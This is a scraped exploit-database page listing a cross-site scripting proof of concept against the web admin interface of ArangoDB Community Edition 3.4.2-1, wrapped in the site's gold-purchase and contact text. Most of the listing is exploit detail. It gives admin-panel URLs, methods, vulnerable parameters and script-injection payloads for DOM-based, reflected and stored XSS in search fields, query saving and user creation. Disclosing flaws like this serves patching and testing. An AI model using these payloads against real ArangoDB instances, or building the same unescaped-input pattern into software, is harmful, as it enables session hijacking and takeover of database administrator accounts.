0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

ArangoDB Community Edition 3.4.2-1 - Cross-Site Scripting Vulnerability

Author

Ozer Goker

Risk

[

Security Risk Medium

]

0day-ID

Category

Date add

Platform

##################################################################################################################################
# Exploit Title: ArangoDB Community Edition 3.4.2-1 | Cross-Site Scripting
# Exploit Author: Ozer Goker
# Vendor Homepage: https://www.arangodb.com
# Software Link: https://www.arangodb.com/download-major/
# Version: 3.4.2-1
##################################################################################################################################

Introduction

ArangoDB is a native multi-model, open-source database with flexible data
models for documents, graphs, and key-values. Build high performance
applications using a convenient SQL-like query language or JavaScript
extensions. Use ACID transactions if you require them. Scale horizontally
and vertically with a few mouse clicks.

#################################################################################

XSS details: DOM Based & Reflected & Stored

#################################################################################

XSS1 | DOM Based XSS - Search

URL
http://127.0.0.1:8529/_db/_system/_admin/aardvark/index.html#views


PAYLOAD
"><script>alert(1)</script>

<div class="search-field">
      <input type="text" value=""><script>alert(1)</script>"
id="viewsSearchInput" class="search-input" placeholder="Search..."/>
      <i id="viewsSearchSubmit" class="fa fa-search"></i>
</div>

#################################################################################

XSS2 | Reflected & Stored - Save as

URL
http://127.0.0.1:8529/_db/_system/_admin/aardvark/index.html#queries
http://127.0.0.1:8529/_db/_system/_api/user/root

METHOD
PATCH

PARAMETER
name

PAYLOAD
"><script>alert(2)</script>

#################################################################################

XSS3 | Stored - Delete query

URL
http://127.0.0.1:8529/_db/_system/_admin/aardvark/index.html#queries
http://127.0.0.1:8529/_db/_system/_api/user/root

METHOD
Get

#################################################################################

XSS3 | Reflected & Stored - Add User

URL
http://127.0.0.1:8529/_db/_system/_admin/aardvark/index.html#users
http://127.0.0.1:8529/_db/_system/_api/user
http://127.0.0.1:8529/_db/_system/_admin/aardvark/index.html#user/%22%3E%3Cscript%3Ealert(3)%3C%2Fscript%3E

METHOD
Post

PARAMETER
user,name

PAYLOAD
"><script>alert(3)</script>
"><script>alert(4)</script>

#################################################################################

XSS5 | DOM Based XSS - Search

URL
http://127.0.0.1:8529/_db/_system/_admin/aardvark/index.html#users


PAYLOAD
"><script>alert(5)</script>

<div class="search-field">
      <input type="text" value=""><script>alert(5)</script>"
id="userManagementSearchInput" class="search-input"
placeholder="Search..."/>
      <!-- <img id="userManagementSearchSubmit" class="search-submit-icon">
-->
      <i id="userManagementSearchSubmit" class="fa fa-search"></i>
</div>

#################################################################################

XSS6 | DOM Based XSS - Search

URL
http://127.0.0.1:8529/_db/_system/_admin/aardvark/index.html#databases


PAYLOAD
"><script>alert(6)</script>

<div class="search-field">
      <input type="text" value=""><script>alert(6)</script>"
id="databaseSearchInput" class="search-input" placeholder="Search..."/>
      <!-- <img id="databaseSearchSubmit" class="search-submit-icon">-->
      <i id="databaseSearchSubmit" class="fa fa-search"></i>
</div>

#################################################################################

#  0day.today [2024-11-16]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

ArangoDB Community Edition 3.4.2-1 - Cross-Site Scripting Vulnerability

Report Error

Report Error